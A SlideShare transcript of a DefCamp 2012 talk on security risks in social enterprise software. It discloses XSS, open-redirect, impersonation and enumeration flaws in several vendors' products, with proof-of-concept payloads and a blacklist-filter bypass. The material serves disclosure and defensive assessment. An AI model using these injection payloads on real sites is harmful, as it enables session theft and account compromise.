Social Enterprise Software Rises!…and so are the RisksMarian Ventuneacmarian.ventuneac@gmail.com@mventuneac
About myself Security Architect International presenter Member of OWASP and ISACA global organizations OWASP Ireland L...
Agenda Social Enterprise Software: What, Why, and How? Social Enterprise Software & Risks Thoughts on Calculated Risk ...
Social Enterprise Software: What? Social Enterprise/Social Enterprise Networks/Social  Enterprise Software Enterprise so...
Social Enterprise Software: Why? Improve communication an increase work efficiency     internal collaboration     estab...
Social Enterprise Software: Deployment models On-premise solutions     Deployed inside the enterprise network, usually c...
Social Enterprise Software: Some of the Risks Potential loss of enterprise data     Understand what type of data needs t...
Common Strategies for Risk Mitigation Vendor/supplier due diligence Security policies (generic/dedicated) Security proc...
Calculated Risks9                   An Introduction to Web Application Security Risks
Calculated Risks (cont) Business requirement:     WE (the company) need social enterprise software X for Y and Z     reas...
Let’s Take a Closer Look Software defects leading to exploitation of security  vulnerabilities    OWASP Top 10 Security ...
Let’s Take a Closer Look (cont) Trust but verify    Reach an agreement to test the chosen solution in a suitable     env...
The Closer Look (cont) A practical take on assessing security of social  enterprise software solutions Some of the chose...
The Closer Look (cont) Assessment criteria including tests for    Cross-Site Scripting (XSS)    Insecure Direct Object ...
Blogtronix Enterprise Blogtronix Enterprise v4.0.4179 (on-premise) and SaaS CVE-2011-1039 - Multiple XSS Vulnerabilities...
Blogtronix Enterprise (cont) CVE-2011-1039 - Multiple XSS Vulnerabilities    Reflected XSS in login     page via arbitra...
Blogtronix Enterprise (cont) Insecure Direct Object Reference (variant)    Valid user A can potentially impersonate anot...
Blogtronix Enterprise (cont) Security Missconfiguration Enumerate valid user IDs    Unauthenticated attacker checks for...
Blogtronix Enterprise (cont) Improper Error Handling                            An Introduction to Web Application Securi...
Blogtronix Enterprise (cont) CVE-2011-1040 Unvalidated Redirects       https://test_site/pages/login/?ReturnUrl=http%3a%2...
Salesforce Chatter SaaS Multiple persistent XSS vulnerabilities    via user profile first &     last name  <a href="/005...
Salesforce Chatter SaaS (cont) Improper User Input Validation    File Sharing - CR LF symbols accepted into file title  ...
Salesforce Chatter Desktop Improper Error Handling leading to Information Disclosure    submitting comments for inexiste...
Yammer Persistent XSS via group nameHTTP POST request:/ventuneac.net/groups HTTP/1.1Host: www.yammer.com…----------------...
Jive Persistent XSS via group name (create/edit)HTTP POST request:POST /create-group.jspa HTTP/1.1Host: ventuneac.jiveon....
BroadVision Clearvale SaaS Multiple persistent XSS vulnerabilities    via user profile first &     last name & search pa...
BroadVision Clearvale SaaS (cont) The broken fix for user profile name XSS issue    Black-list user input validation    ...
BroadVision Clearvale SaaS (cont) The broken fix for user profile name XSS issue    Bypassing Clearvale XSS filter  XSS ...
Knowing What ‘private’ Really Means Social Enterprise Software usually provides document  sharing/publishing functionalit...
AntiVirus & anti-malware file scanningBroadVision Clearvale has a built-in AV scanning engineThe rest of tested solution...
The Closer Look: SummaryCommon security vulnerabilities - can be easily exploitedUser shared information is not properly...
Final ThoughtsEven if the vendor is a market leader, it doesn’t necessarily mean they get application security rightDare...
Thank Youmarian.ventuneac@gmail.com@mventuneac
Upcoming SlideShare
Loading in...5
×

Social Enterprise Rises! …and so are the Risks - DefCamp 2012

464

Published on

0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
464
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
5
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Transcript of "Social Enterprise Rises! …and so are the Risks - DefCamp 2012"

  1. 1. Social Enterprise Software Rises!…and so are the RisksMarian Ventuneacmarian.ventuneac@gmail.com@mventuneac
  2. 2. About myself Security Architect International presenter Member of OWASP and ISACA global organizations OWASP Ireland Limerick Chapter Leader https://www.owasp.org/index.php/Ireland-Limerick Security Researcher PhD, MEng http://www.ventuneac.net http://secureappdev.blogspot.com http://dcsl.ul.ie2 An Introduction to Web Application Security Risks
  3. 3. Agenda Social Enterprise Software: What, Why, and How? Social Enterprise Software & Risks Thoughts on Calculated Risk Social Enterprise Software & Risks (some case studies) Final Thoughts3 An Introduction to Web Application Security Risks
  4. 4. Social Enterprise Software: What? Social Enterprise/Social Enterprise Networks/Social Enterprise Software Enterprise solutions providing Facebook-like social networking functionality ‘social networking’ + ‘enterprise software’ = ‘social enterprise networking’4 An Introduction to Web Application Security Risks
  5. 5. Social Enterprise Software: Why? Improve communication an increase work efficiency  internal collaboration  establish teams, communities or informal groups  share knowledge and learn from other people experiences  social networking  external collaboration with partners … Used by employees and external customers, suppliers, partners5 An Introduction to Web Application Security Risks
  6. 6. Social Enterprise Software: Deployment models On-premise solutions  Deployed inside the enterprise network, usually controlled and managed by the client Public Cloud-based solutions  Software as a Service (SaaS) - Hosted and administered by the vendor Hybrid deployments Usually open to allow external collaboration  customers, suppliers, third-party contractors, etc6 An Introduction to Web Application Security Risks
  7. 7. Social Enterprise Software: Some of the Risks Potential loss of enterprise data  Understand what type of data needs to be uploaded there  Do you know/control what data is actually being shared? Exploitation of common application vulnerabilities Phishing attacks, social engineering Viruses and malware Cloud-based solutions – various compliance and security concerns  Do you know where is your data stored?7 An Introduction to Web Application Security Risks
  8. 8. Common Strategies for Risk Mitigation Vendor/supplier due diligence Security policies (generic/dedicated) Security processes & procedures  Control the data being shared (data classification)  Verify identity of users accessing the data (authentication)  Control user access to data  Approve/Create/Lock user accounts (accounts management)  Remote wipe (for mobile devices – smartphone, tablets, etc) …8 An Introduction to Web Application Security Risks
  9. 9. Calculated Risks9 An Introduction to Web Application Security Risks
  10. 10. Calculated Risks (cont) Business requirement: WE (the company) need social enterprise software X for Y and Z reasons. IT Security (most likely take on it):  Scenario 1: No, there is to much risk to take!  Scenario 2: Yes - We trust our partners and their choices.  Scenario 3: Yes - IF Business ASSUMES ALL THE RISKS…  Scenario 4: Let’s take a closer look at it…  Scenario 5: Yes - the vendor is big enough and we can trust it (= the vendor takes application security seriously)10 An Introduction to Web Application Security Risks
  11. 11. Let’s Take a Closer Look Software defects leading to exploitation of security vulnerabilities  OWASP Top 10 Security Risks  CVE/SANS Top 25 Programming Errors Vendor size – a plus, but doesn‘t guarantee the chosen solution is vulnerability free It is safe to assume there is no application 100% secure If anyone claims such a thing, can they provide reasonable proof? An Introduction to Web Application Security Risks
  12. 12. Let’s Take a Closer Look (cont) Trust but verify  Reach an agreement to test the chosen solution in a suitable environment (ideally prior of any contracts being signed)  Manual security testing  Automated security testing  Responsible disclosure Most likely you will not be disappointed  An Introduction to Web Application Security Risks
  13. 13. The Closer Look (cont) A practical take on assessing security of social enterprise software solutions Some of the chosen ones An Introduction to Web Application Security Risks
  14. 14. The Closer Look (cont) Assessment criteria including tests for  Cross-Site Scripting (XSS)  Insecure Direct Object Reference  Security Missconfiguration  Failure to Restrict URL Access  Unvalidated Redirects and Forwards  Logical Flaws … An Introduction to Web Application Security Risks
  15. 15. Blogtronix Enterprise Blogtronix Enterprise v4.0.4179 (on-premise) and SaaS CVE-2011-1039 - Multiple XSS Vulnerabilities  Persistent (partially) XSS via Search functionality (auth. user) HTTP request: http://test_site/Home/pages/search/?search= <script>alert(document.cookie)</script> &sub=1&tab=0 HTTP response: … <a href="/Home/pages/search/?search=%3cscript %3ealert(document.cookie)%3b&amp;sub=1 &amp;tab=0"> <script>alert(docume...</a> </span> <span style=“ … An Introduction to Web Application Security Risks
  16. 16. Blogtronix Enterprise (cont) CVE-2011-1039 - Multiple XSS Vulnerabilities  Reflected XSS in login page via arbitrary parameter HTTP request: https://test_site/pages/login/?a"> <script>alert(document.cookie)</script> HTTP response: <form method="post" action="/pages/login/? a"><script>alert(document.cookie)</script>" id="aspnetForm">  Multiple Reflected XSS via existing and arbitrary parameters of existing resources An Introduction to Web Application Security Risks
  17. 17. Blogtronix Enterprise (cont) Insecure Direct Object Reference (variant)  Valid user A can potentially impersonate another user B  Tamper value of userAccountID_http://test_site/ cookie (ASP.NET GUID)1. At login time - replace value of userAccountID_ cookie with the one matching user B 2. Do something noticeable (post a message in group X) & log out 3. As authenticated user A, review user recent B’s activity – user B appears as a recent visitor of group X An Introduction to Web Application Security Risks
  18. 18. Blogtronix Enterprise (cont) Security Missconfiguration Enumerate valid user IDs  Unauthenticated attacker checks for https://test_site/users/user_id  if user_id exists, redirected to login  if not, display custom error Enumerate valid groups  Unauthenticated attacker checks for https://test_site/group_id/pages/people/  if group_id exists, redirected to login  if not, display custom error An Introduction to Web Application Security Risks
  19. 19. Blogtronix Enterprise (cont) Improper Error Handling An Introduction to Web Application Security Risks
  20. 20. Blogtronix Enterprise (cont) CVE-2011-1040 Unvalidated Redirects https://test_site/pages/login/?ReturnUrl=http%3a%2f%2fwww.google.co.uk%2f  Once the user logs in, he/she gets redirected to the resource previously stated via ReturnUrl parameter CVE-2011-1041 Failure to restrict access to protected resources  Attacker knows hashed user ID and name of uploaded file => file can be accessed without auth.  Attacker knows hashed user ID => user profile picture can be accessed without auth. An Introduction to Web Application Security Risks
  21. 21. Salesforce Chatter SaaS Multiple persistent XSS vulnerabilities  via user profile first & last name <a href="/005D00000022Ouw" class= "entityLink" title="Adam" onmouseover="alert(1)" Cole"> Adam&quot; onmouseover=&quot;alert(1)& quot; Cole</a>  via group name <a href="/0F9D0000000PPwz" class= "entityLink" title="test_group" onmouseover="alert(3)"">test_group& quot; onmouseover=&quot;alert(3)&quot;</a> An Introduction to Web Application Security Risks
  22. 22. Salesforce Chatter SaaS (cont) Improper User Input Validation  File Sharing - CR LF symbols accepted into file title (via SaaS solution) POST /mobile/direct/23.0/ 005D0000001yD7B/feed_items.json HTTP/1.1 Host: eu1.salesforce.com … Content-Disposition: form-data; name="title” arv_test52%0a%0d%0a An Introduction to Web Application Security Risks
  23. 23. Salesforce Chatter Desktop Improper Error Handling leading to Information Disclosure  submitting comments for inexistent posts HTTP POST request: /mobile/direct/23.0/0D5D00000000000/comments.json HTTP/1.1 Error: {"status":404,"msg":"NoDataFoundException: ORA-20001: nORA-06512: at "DOPEY.CFEEDCOMMENT", line 149nORA-06512: at "DOPEY.CFEEDCOMMENT", line 253nORA-06512: at line 1n: {call cFeedComment.insert_feedcomments(?,?,?,?,?,?,?,?,?,?,?,?,?)})}"}  attempting to ‘like’ and inexistent post HTTP POST request: /mobile/direct/23.0/0D5D00000000000/like.json HTTP/1.1 Error: {"status":404,"msg":"NoDataFoundException: ORA-20001: nORA-06512: at "DOPEY.CFEEDLIKE", line 156nORA-06512: at "DOPEY.CFEEDLIKE", line 217nORA-06512: at "DOPEY.CFEEDLIKE", line 118nORA-06512: at line 1n: {call cFeedLike.insert_detail(?,?,?,?,?,?,?,?)})}"} An Introduction to Web Application Security Risks
  24. 24. Yammer Persistent XSS via group nameHTTP POST request:/ventuneac.net/groups HTTP/1.1Host: www.yammer.com…-----------------------------295562556131627Content-Disposition: form-data; name="group[name]"a4" onmouseover="alert(4)"-----------------------------295562556131627HTTP response (home page):GET /ventuneac.net/ HTTP/1.1Host: www.yammer.com…<a href="/ventuneac.net/groups/a4onmouseoveralert4"class="nav-list-link" title="a4" onmouseover="alert(4)" group"> An Introduction to Web Application Security Risks
  25. 25. Jive Persistent XSS via group name (create/edit)HTTP POST request:POST /create-group.jspa HTTP/1.1Host: ventuneac.jiveon.com…-----------------------------215202979014924Content-Disposition: form-data; name="description"group2"><script>alert(1)</script>-----------------------------215202979014924HTTP response (load group from Places):GET /groups/group2 HTTP/1.1Host: ventuneac.jiveon.com…<meta name="description" content="group2"><script>alert(1)</script>" /> An Introduction to Web Application Security Risks
  26. 26. BroadVision Clearvale SaaS Multiple persistent XSS vulnerabilities  via user profile first & last name & search page <a href="http://vmarian.clearvale.com/pg/profile/3" rel="me" . title="m" style="xss:expr/*XSS*/ession( document.location(http://www.google.co.uk))"> m&quot; style=&quot;xss:expr/*XS...</a>  via group name & search page <a href="http://vmarian.clearvale.com/pg/groups/ 23/aaaa-stylexssexprxssessiondocumentlocation httpwwwgooglecouk/" title="aaa"> <a style="xss:expr/*XSS*/ession( document.location(http://www.google.co.uk))"> aaa&quot;&gt;&lt;a style=&quot;xss:exp...</a> An Introduction to Web Application Security Risks
  27. 27. BroadVision Clearvale SaaS (cont) The broken fix for user profile name XSS issue  Black-list user input validation style followed by = becomes style00 (style=, style =, etc) document.location followed by ( becomes document.location00 alert followed by ( becomes 00 /* becomes /0* for first instance only */ becomes *0/ …  Improper output escaping An Introduction to Web Application Security Risks
  28. 28. BroadVision Clearvale SaaS (cont) The broken fix for user profile name XSS issue  Bypassing Clearvale XSS filter XSS payload: firstname: m” style lastname: ="/**/;xss:expr/**/ession(alert/**/(aaa)) HTTP response: … <a href="http://vmarian.clearvale.com/pg/profile/3" rel="me" . title="m" style ="/0**0/;xss:expr/**/ession(alert/**/(aaa)) ">m&quot; style =&quot;/0**0/;xss:...</a> An Introduction to Web Application Security Risks
  29. 29. Knowing What ‘private’ Really Means Social Enterprise Software usually provides document sharing/publishing functionality  Private (not shared with anyone – default option)  Shared with private (locked) groups/members  Shared with public groups  Shared with everyone (shared via public link) In certain conditions, the private documents can become… less private  An Introduction to Web Application Security Risks
  30. 30. AntiVirus & anti-malware file scanningBroadVision Clearvale has a built-in AV scanning engineThe rest of tested solutions currently lack such capabilitiesYammer and Salesforce plan to add AV file scanningNo malicious files were used for testing AV capabilities An Introduction to Web Application Security Risks
  31. 31. The Closer Look: SummaryCommon security vulnerabilities - can be easily exploitedUser shared information is not properly validated and sanitised  A malicious user can inject JavaScript malware into his/her profile/groups/actions/etc  Where such user controlled data is seen/accessed by other users, their accounts can easily get compromisedExploitation of such vulnerabilities could severely compromise security of enterprise data An Introduction to Web Application Security Risks
  32. 32. Final ThoughtsEven if the vendor is a market leader, it doesn’t necessarily mean they get application security rightDare to ask for proofs of application security Trust but verifyVendor due diligence, social enterprise software related security policies & security procedures, etcInterested on this kind of benchmarks? OWASP Security Baseline Project https://www.owasp.org/index.php/OWASP_Security_Baseline_Project An Introduction to Web Application Security Risks
  33. 33. Thank Youmarian.ventuneac@gmail.com@mventuneac
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×